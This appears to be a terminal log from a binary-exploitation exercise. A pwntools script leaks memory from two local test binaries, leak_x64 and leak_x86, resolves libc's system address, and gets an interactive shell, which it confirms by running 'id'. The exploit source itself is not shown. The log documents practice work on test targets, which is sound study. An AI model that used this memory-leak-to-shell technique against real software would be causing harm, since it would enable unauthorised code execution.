ex@Ex:~/test$ ./exp.py
[+] Starting local process './leak_x64': Done
[*] '/home/ex/test/leak_x64'
    Arch: amd64-64-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE
[+] Loading from '/home/ex/test/leak_x64': 0x7f19d1b2c170
[+] Resolving 'system' in 'libc.so': 0x7f19d1b2c170
[!] No ELF provided. Leaking is much faster if you have a copy of the ELF being leaked.
[*] Magic did not match
[*] .gnu.hash/.hash, .strtab and .symtab offsets
[*] Found DT_GNU_HASH at 0x7f19d18fcbe0
[*] Found DT_STRTAB at 0x7f19d18fcbf0
[*] Found DT_SYMTAB at 0x7f19d18fcc00
[*] .gnu.hash parms
[*] hash chain index
[*] hash chain
[+] system_addr: 0x7f19d1561440
[*] Switching to interactive mode
$ id
uid=1000(ex) gid=1000(ex) groups=1000(ex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),127(sambashare),129(wireshark),132(docker)
$
[*] Interrupted
[*] Stopped program './leak_x64'

ex@Ex:~/test$ ./exp.py
[+] Starting local process './leak_x86': Done
[*] '/home/ex/test/leak_x86'
    Arch: i386-32-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE
[+] Loading from '/home/ex/test/leak_x86': 0xf7f05940
[+] Resolving 'system' in 'libc.so': 0xf7f05940
[!] No ELF provided. Leaking is much faster if you have a copy of the ELF being leaked.
[*] Trying lookup based on Build ID: 0e188ec5f09c187a7a92784d4b97aa251b15a93c
[*] Downloading data from GitHub
[-] Downloading 'https://gitlab.com/libcdb/libcdb/raw/master/hashes/build_id/0e188ec5f09c187a7a92784d4b97aa251b15a93c': Got code 404
[*] .gnu.hash/.hash, .strtab and .symtab offsets
[*] Found DT_GNU_HASH at 0xf7eb5d9c
[*] Found DT_STRTAB at 0xf7eb5da4
[*] Found DT_SYMTAB at 0xf7eb5dac
[*] .gnu.hash parms
[*] hash chain index
[*] hash chain
[+] system_addr: 0xf7d1b200
[*] Switching to interactive mode
$ id
uid=1000(ex) gid=1000(ex) groups=1000(ex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),127(sambashare),129(wireshark),132(docker)
$
[*] Interrupted
[*] Stopped program './leak_x86'